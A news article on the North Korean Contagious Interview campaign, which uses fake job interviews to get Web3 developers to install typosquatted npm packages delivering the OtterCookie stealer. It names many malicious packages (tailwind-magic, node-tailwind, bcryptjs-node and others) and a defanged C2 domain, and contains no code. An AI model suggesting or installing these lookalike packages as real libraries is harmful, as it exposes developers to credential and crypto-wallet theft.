North Korean hackers continue to poison npm packages with malicious JavaScript libraries targeting developers in the ongoing Contagious Interview campaign.
One month after October 10, 2025, the attackers added 197 additional malicious npm packages with over 31,000 cumulative downloads, suggesting they have adopted the JavaScript ecosystem as their preferred method of compromise.
“This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm, and it shows how thoroughly North Korean threat actors have adapted their tooling to modern JavaScript and crypto-centric development workflows,” Socket researchers stated.
Between July 14 and October 10, 2025, the previous Contagious Interview campaign had introduced 338 malicious packages, with over 50,000 total downloads.
North Korean hackers target Web3 and blockchain developers with malicious npm packages
According to Socket Threat Research Team, North Korean hackers target blockchain and Web3 developers through fake interviews and test assignments to trick them into downloading and installing the malicious npm packages.
They disguise malicious libraries as useful and harmless utilities with easily recognizable names, such as tailwind-magic, node-tailwind, and react-modal-select.
Others include bcryptjs-node, cross-sessions, json-oauth, react-adparser, session-keeper, tailwindcss-forms, and webpack-loadcss. At least 15 malicious npm packages were still alive at the time of publication.
Additionally, some of the malicious npm packages, such as tailwind-magic, mirror known libraries, like tailwind-merge, through typosquatting. They also exhibit the same installation behavior, although with minor behavioral differences, to trick developers familiar with the libraries into believing they were dealing with the same legitimate repository.
“The code exported from dist/ behaves like a normal Tailwind class-merging utility, but a postinstall script executes src/lib/index.js, which uses axios to call the threat actor-controlled endpoint,” they wrote.
North Korean hackers also use impressive cloned crypto-themed websites to make their lures more believable to blockchain developers.
“In addition, we analyzed repositories named after crypto-themed projects, including a cloned Knightsbridge DEX front-end (dexproject) wired to the malicious node-tailwind package, as well as numerous token- and DeFi-branded repositories used as lures,” the researchers said.
North Korean hackers have been involved in other crypto-themed hacking campaigns. In 2022, they distributed a trojanized cryptocurrency application, AppleJeus, targeting blockchain companies, DeFi firms, and holders of large crypto assets.
Meanwhile, cybersecurity researchers have described the Contagious Interview hacking campaign as an industrial-scale hacking campaign, targeting the software supply chain.
“Contagious Interview is an industrialized software supply chain campaign, not a one-off backdoor,” warned Collin Hogue-Spears, Senior Director of Solution Management at Black Duck. “State-sponsored attackers are recruiting companies’ software developers through fake job interviews, and one malicious ‘take-home test’ on a corporate laptop gives them the access that an insider would have, without ever appearing on your payroll.”
North Korean hackers distribute OtterCookie via Vercel C2 servers
North Korean hackers use a distributed cybercrime infrastructure hosted on legitimate platforms, such as Vercel and GitHub, to distribute malware to unsuspecting developers.
According to the researchers, the malicious npm packages connect to a Vercel-hosted command-and-control server at tetrismic[.]vercel[.]app to fetch OtterCookie from a GitHub repository hosted by the threat actor stardev0914. The GitHub account hosted at least 18 malicious npm packages but has since been removed.
“The threat actors split this infrastructure into three components. GitHub hosts the development repository. Vercel serves the current payload on demand. A separate C2 server receives data and issues tasks once the loader runs, which isolates operations,” they explained.
OtterCookie is a BeaverTail malware variant that establishes a command-and-control server and a remote shell to maintain persistence.
The cross-platform payload steals browser and crypto wallet credentials, copies clipboard contents, records keystrokes, and takes screenshots. It also recursively searches the file system for sensitive documents and uploads them to a threat-actor-controlled server.
To avoid detection, it checks whether it is running in a virtual machine or sandbox to ensure that security researchers do not analyze it before performing the intended malicious actions.
“The main point is that this research illustrates how advanced and organized modern supply chain attacks have become,” said Randolph Barr, Chief Information Security Officer at Cequence Security. “Socket’s investigation reveals a highly organized group of hackers running the Contagious Interview campaign. This included GitHub repositories, npm packages, staging on platforms like Vercel, and regular modifications to the payload. From my perspective, it seems just like a simplified software development lifecycle, but for malware instead of product features.”
